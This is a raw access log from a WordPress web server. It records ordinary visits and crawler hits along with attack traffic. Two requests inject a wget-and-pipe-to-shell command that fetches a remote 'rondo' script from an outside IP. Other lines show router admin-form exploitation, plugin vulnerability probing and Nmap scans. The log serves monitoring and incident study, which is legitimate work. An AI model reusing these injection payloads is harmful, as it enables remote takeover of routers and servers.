111.45.2.138 - - [19/Oct/2025:04:28:26 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 6.0.1; SOV33 Build/35.0.D.0.326) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36"
111.45.1.74 - - [19/Oct/2025:04:28:26 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 6.0.1; SOV33 Build/35.0.D.0.326) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36"
111.45.1.74 - - [19/Oct/2025:04:28:27 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2292 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 6.0.1; SOV33 Build/35.0.D.0.326) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36"
111.45.2.138 - - [19/Oct/2025:04:28:27 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 6.0.1; SOV33 Build/35.0.D.0.326) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36"
111.45.1.74 - - [19/Oct/2025:04:28:27 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 6.0.1; SOV33 Build/35.0.D.0.326) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36"
111.45.2.138 - - [19/Oct/2025:04:28:27 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled.webp HTTP/1.1" 200 141034 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 6.0.1; SOV33 Build/35.0.D.0.326) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36"
111.45.2.138 - - [19/Oct/2025:04:28:35 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled-50x100.webp HTTP/1.1" 200 1784 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 6.0.1; SOV33 Build/35.0.D.0.326) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36"
111.45.2.138 - - [19/Oct/2025:04:28:35 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled-50x100.webp HTTP/1.1" 200 1784 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 6.0.1; SOV33 Build/35.0.D.0.326) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36"
36.133.115.36 - - [19/Oct/2025:04:30:24 +0800] "POST /wp-cron.php?doing_wp_cron=1760819424.3787109851837158203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.148.93 - - [19/Oct/2025:04:30:24 +0800] "POST /boaform/admin/formTracert HTTP/1.1" 404 8990 "http://36.133.115.36:80/diag_tracert_admin_en.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
36.133.115.36 - - [19/Oct/2025:04:41:47 +0800] "POST /wp-cron.php?doing_wp_cron=1760820107.2956290245056152343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.84 - - [19/Oct/2025:04:41:47 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [19/Oct/2025:04:50:22 +0800] "POST /wp-cron.php?doing_wp_cron=1760820622.1199989318847656250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.171.207.2 - - [19/Oct/2025:04:50:22 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.133.115.36 - - [19/Oct/2025:04:55:20 +0800] "POST /wp-cron.php?doing_wp_cron=1760820920.7979199886322021484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.27 - - [19/Oct/2025:04:55:21 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [19/Oct/2025:05:00:20 +0800] "POST /wp-cron.php?doing_wp_cron=1760821220.1953170299530029296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [19/Oct/2025:05:00:21 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
124.198.131.83 - - [19/Oct/2025:05:11:58 +0800] "POST /boafrm/formSysCmd HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@tutanota.de)"
36.133.115.36 - - [19/Oct/2025:05:11:59 +0800] "POST /wp-cron.php?doing_wp_cron=1760821919.2422420978546142578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [19/Oct/2025:05:36:45 +0800] "POST /wp-cron.php?doing_wp_cron=1760823405.3654379844665527343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.136.150.72 - - [19/Oct/2025:05:36:45 +0800] "GET /wp-content/plugins/workreap/readme.txt HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
103.136.150.72 - - [19/Oct/2025:05:36:45 +0800] "GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
103.136.150.72 - - [19/Oct/2025:05:36:46 +0800] "GET /wp-content/plugins/json-api-user/readme.txt HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Mobile/15E148 Safari/604.1"
103.136.150.72 - - [19/Oct/2025:05:36:46 +0800] "GET /wp-content/plugins/imithemes-listing/readme.txt HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.136.150.72 - - [19/Oct/2025:05:36:46 +0800] "GET /wp-content/plugins/b-blocks/readme.txt HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (SS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0"
103.136.150.72 - - [19/Oct/2025:05:36:46 +0800] "GET /wp-content/plugins/wp-event-solution/readme.txt HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15"
103.136.150.72 - - [19/Oct/2025:05:36:46 +0800] "GET /wp-content/plugins/acf-frontend-form-element/readme.txt HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0"
103.136.150.72 - - [19/Oct/2025:05:36:46 +0800] "GET /wp-content/plugins/iwjob/readme.txt HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
103.136.150.72 - - [19/Oct/2025:05:36:46 +0800] "GET /wp-content/plugins/bsecure/readme.txt HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.136.150.72 - - [19/Oct/2025:05:36:46 +0800] "GET /wp-content/plugins/couponxxl-cpt/readme.txt HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0"
103.136.150.72 - - [19/Oct/2025:05:36:46 +0800] "GET /wp-content/plugins/urbango-membership/readme.txt HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
103.136.150.72 - - [19/Oct/2025:05:36:46 +0800] "GET /wp-content/plugins/wpforo/readme.txt HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Safari/605.1.15"
103.136.150.72 - - [19/Oct/2025:05:36:46 +0800] "GET /wp-content/plugins/private-content/readme.txt HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/17.1.15"
103.136.150.72 - - [19/Oct/2025:05:36:46 +0800] "GET /wp-content/plugins/wp-registration/readme.txt HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.136.150.72 - - [19/Oct/2025:05:36:46 +0800] "GET /wp-content/plugins/support-ticket/readme.txt HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.136.150.72 - - [19/Oct/2025:05:36:47 +0800] "GET /wp-content/plugins/rss-feed-post-generator-echo/readme.txt HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
103.136.150.72 - - [19/Oct/2025:05:36:47 +0800] "GET /wp-content/plugins/lisfinity-core/readme.txt HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
36.133.115.36 - - [19/Oct/2025:05:48:34 +0800] "POST /wp-cron.php?doing_wp_cron=1760824114.9607799053192138671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
213.209.143.66 - - [19/Oct/2025:05:48:35 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [19/Oct/2025:06:35:06 +0800] "POST /wp-cron.php?doing_wp_cron=1760826906.5879700183868408203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.96.129.4 - - [19/Oct/2025:06:35:06 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [19/Oct/2025:06:38:35 +0800] "POST /wp-cron.php?doing_wp_cron=1760827115.5546050071716308593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [19/Oct/2025:06:38:36 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [19/Oct/2025:07:06:33 +0800] "POST /wp-cron.php?doing_wp_cron=1760828793.2079539299011230468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
220.181.108.145 - - [19/Oct/2025:07:06:33 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fbug%2F HTTP/1.1" 200 1105 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [19/Oct/2025:07:10:03 +0800] "POST /wp-cron.php?doing_wp_cron=1760829003.1525499820709228515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
222.178.234.100 - - [19/Oct/2025:07:10:03 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
222.178.234.100 - - [19/Oct/2025:07:10:07 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
222.178.234.100 - - [19/Oct/2025:07:10:07 +0800] "GET /nmaplowercheck1760829006 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
222.178.234.100 - - [19/Oct/2025:07:10:07 +0800] "POST /sdk HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
222.178.234.100 - - [19/Oct/2025:07:10:08 +0800] "GET /evox/about HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
222.178.234.100 - - [19/Oct/2025:07:10:08 +0800] "GET /HNAP1 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
222.178.234.100 - - [19/Oct/2025:07:10:17 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
222.178.234.100 - - [19/Oct/2025:07:10:18 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [19/Oct/2025:07:25:06 +0800] "POST /wp-cron.php?doing_wp_cron=1760829906.6900050640106201171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [19/Oct/2025:07:25:07 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
222.178.234.100 - - [19/Oct/2025:07:25:29 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
222.178.234.100 - - [19/Oct/2025:07:25:34 +0800] "GET /nmaplowercheck1760829933 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
222.178.234.100 - - [19/Oct/2025:07:25:34 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
222.178.234.100 - - [19/Oct/2025:07:25:34 +0800] "POST /sdk HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
222.178.234.100 - - [19/Oct/2025:07:25:35 +0800] "GET /HNAP1 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
222.178.234.100 - - [19/Oct/2025:07:25:35 +0800] "GET /evox/about HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
222.178.234.100 - - [19/Oct/2025:07:25:44 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
222.178.234.100 - - [19/Oct/2025:07:25:45 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [19/Oct/2025:07:26:12 +0800] "POST /wp-cron.php?doing_wp_cron=1760829972.7788560390472412109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
222.178.234.100 - - [19/Oct/2025:07:26:12 +0800] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
222.178.234.100 - - [19/Oct/2025:07:26:12 +0800] "HEAD / HTTP/1.1" 200 0 "http://www.cqqizhou.com:80" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
222.178.234.100 - - [19/Oct/2025:07:26:13 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
222.178.234.100 - - [19/Oct/2025:07:26:13 +0800] "GET / HTTP/1.1" 200 33932 "http://www.cqqizhou.com:80" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
42.236.17.74 - - [19/Oct/2025:07:30:58 +0800] "GET / HTTP/1.1" 200 33932 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
42.236.101.219 - - [19/Oct/2025:07:30:58 +0800] "GET / HTTP/1.1" 200 33932 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
36.133.115.36 - - [19/Oct/2025:07:42:36 +0800] "POST /wp-cron.php?doing_wp_cron=1760830956.7906050682067871093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
147.185.132.115 - - [19/Oct/2025:07:42:36 +0800] "GET / HTTP/1.0" 301 0 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [19/Oct/2025:07:49:47 +0800] "POST /wp-cron.php?doing_wp_cron=1760831387.5431809425354003906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
144.172.103.124 - - [19/Oct/2025:07:49:48 +0800] "GET / HTTP/1.0" 200 109870 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [19/Oct/2025:07:50:55 +0800] "POST /wp-cron.php?doing_wp_cron=1760831455.9230909347534179687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.132.153.120 - - [19/Oct/2025:07:50:55 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
66.132.153.120 - - [19/Oct/2025:07:51:02 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [19/Oct/2025:08:13:18 +0800] "POST /wp-cron.php?doing_wp_cron=1760832798.3147959709167480468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [19/Oct/2025:08:13:19 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [19/Oct/2025:08:14:25 +0800] "POST /wp-cron.php?doing_wp_cron=1760832865.6841380596160888671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.153.34.54 - - [19/Oct/2025:08:14:25 +0800] "GET / HTTP/1.1" 200 33467 "-" "Linux Gnu (cow)"
36.133.115.36 - - [19/Oct/2025:08:31:11 +0800] "POST /wp-cron.php?doing_wp_cron=1760833871.7815299034118652343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
180.213.82.4 - - [19/Oct/2025:08:31:11 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
36.133.115.36 - - [19/Oct/2025:08:43:56 +0800] "POST /wp-cron.php?doing_wp_cron=1760834636.0222430229187011718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
162.216.149.143 - - [19/Oct/2025:08:43:56 +0800] "GET / HTTP/1.1" 200 33466 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [19/Oct/2025:09:07:08 +0800] "POST /wp-cron.php?doing_wp_cron=1760836028.2485260963439941406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.96.129.4 - - [19/Oct/2025:09:07:08 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [19/Oct/2025:09:10:29 +0800] "POST /wp-cron.php?doing_wp_cron=1760836229.3532381057739257812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.84 - - [19/Oct/2025:09:10:29 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [19/Oct/2025:09:25:35 +0800] "POST /wp-cron.php?doing_wp_cron=1760837135.5683820247650146484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
93.174.93.12 - - [19/Oct/2025:09:25:35 +0800] "GET / HTTP/1.0" 301 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6; rv:57.0) Gecko/20100101 Firefox/57.0"
36.133.115.36 - - [19/Oct/2025:09:31:08 +0800] "POST /wp-cron.php?doing_wp_cron=1760837468.6879079341888427734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
161.35.81.127 - - [19/Oct/2025:09:31:08 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
36.133.115.36 - - [19/Oct/2025:10:10:58 +0800] "POST /wp-cron.php?doing_wp_cron=1760839858.2930099964141845703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.119 - - [19/Oct/2025:10:10:58 +0800] "HEAD /developmentserver/metadatauploader HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36"
36.133.115.36 - - [19/Oct/2025:10:17:39 +0800] "POST /wp-cron.php?doing_wp_cron=1760840259.0694410800933837890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
27.156.185.137 - - [19/Oct/2025:10:17:39 +0800] "GET / HTTP/1.0" 301 0 "https://www.baidu.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36"
27.156.185.137 - - [19/Oct/2025:10:17:39 +0800] "GET / HTTP/1.0" 200 153652 "https://www.baidu.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36"
124.198.131.83 - - [19/Oct/2025:10:21:41 +0800] "GET /wget_test.asp?url=%60wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.rwx.sh%7Csh%60&count=1 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@tutanota.de)"
36.133.115.36 - - [19/Oct/2025:10:21:41 +0800] "POST /wp-cron.php?doing_wp_cron=1760840501.8530509471893310546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [19/Oct/2025:10:25:02 +0800] "POST /wp-cron.php?doing_wp_cron=1760840702.3116359710693359375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
203.33.203.148 - - [19/Oct/2025:10:25:02 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [19/Oct/2025:10:27:02 +0800] "POST /wp-cron.php?doing_wp_cron=1760840822.7610599994659423828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
213.209.143.66 - - [19/Oct/2025:10:27:03 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
42.84.85.247 - - [19/Oct/2025:10:29:02 +0800] "GET //contacts/ HTTP/1.0" 200 76283 "https://www.baidu.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36"
60.185.9.95 - - [19/Oct/2025:10:29:03 +0800] "GET //about/ HTTP/1.0" 200 119193 "https://www.baidu.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36"
36.133.115.36 - - [19/Oct/2025:10:36:03 +0800] "POST /wp-cron.php?doing_wp_cron=1760841363.2365689277648925781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [19/Oct/2025:10:36:04 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
3.143.33.63 - - [19/Oct/2025:10:36:39 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [19/Oct/2025:10:37:01 +0800] "POST /wp-cron.php?doing_wp_cron=1760841421.3078720569610595703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
3.143.33.63 - - [19/Oct/2025:10:37:01 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.143.33.63 - - [19/Oct/2025:10:37:07 +0800] "GET / HTTP/1.1" 200 33932 "http://36.133.115.36/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [19/Oct/2025:10:46:27 +0800] "POST /wp-cron.php?doing_wp_cron=1760841987.9619541168212890625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [19/Oct/2025:10:46:28 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
124.198.131.83 - - [19/Oct/2025:10:55:07 +0800] "GET /goform/exeCommand?cmdinput=%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.uzz.sh%7Csh%3B HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@tutanota.de)"
36.133.115.36 - - [19/Oct/2025:10:55:08 +0800] "POST /wp-cron.php?doing_wp_cron=1760842508.0387210845947265625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [19/Oct/2025:11:07:52 +0800] "POST /wp-cron.php?doing_wp_cron=1760843272.7666850090026855468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [19/Oct/2025:11:07:53 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [19/Oct/2025:11:10:46 +0800] "POST /wp-cron.php?doing_wp_cron=1760843446.1166439056396484375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
35.203.210.109 - - [19/Oct/2025:11:10:46 +0800] "GET /wp-login.php HTTP/1.1" 200 8672 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
112.19.105.85 - - [19/Oct/2025:11:11:18 +0800] "GET /pmd/index.php HTTP/1.1" 404 27 "-" "-"
